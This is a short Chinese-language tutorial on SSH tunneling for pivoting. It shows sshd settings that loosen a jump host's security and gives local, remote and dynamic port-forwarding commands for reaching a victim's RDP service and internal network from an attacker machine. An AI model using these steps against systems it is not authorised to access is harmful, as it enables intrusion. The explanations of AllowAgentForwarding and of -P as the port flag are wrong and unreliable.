SSH隧道

一、本地端口转发(跳板机有外网和内网地址)

1、跳板机配置

vim /etc/ssh/sshd_config //SSH配置文件

AllowAgentForwarding yes            //是否允许转发TCP协议
GatewayPorts yes                    //是否允许远程主机连接本地转发端口
PermitRootLogin yes                 //是否允许root用户登陆
PasswordAuthentication yes          //是否允许使用基于密码的认证
TCPKeepAlive yes                    //保持心跳，防止ssh断开

service ssh restart //开启ssh服务

2、攻击机

ssh命令参数：

• -C 压缩传输，加快传输速度
• -f 将SSH转入后台执行，不占用当前的shell
• -N 建立静默连接（建立了连接，但是看不到具体会话）
• -g 允许远程主机连接到本地用于转发的端口
• -L 本地端口转发
• -R 远程端口转发
• -D 动态转发（socks代理）
• -P 指定SSH端口

ssh -CfNg -L 2121:1.1.1.10:3389 root@192.168.1.11      //将受害机的3389端口转发到本地2121端口，1.1.1.10是受害机，192.168.1.11跳板机
rdesktop 127.0.0.1:2121      //访问本地2121端口，就是访问受害机的3389端口

二、远程端口转发（跳板机没有外网地址，但是可以访问外网）

1、跳板机

ssh -R 3307:1.1.1.2:3389 root@192.168.1.9 //1.1.1.2是受害机，192.168.1.9是攻击机

2、攻击机

rdesktop 127.0.0.1:3307

三、动态端口转发（跳板机有外网地址，有内网）

ssh -D 7000 root@192.168.1.12 //攻击机与跳板机建立隧道，192.168.1.12是跳板机，root是跳板机的用户名

可以使用127.0.0.1 7000做代理访问内网服务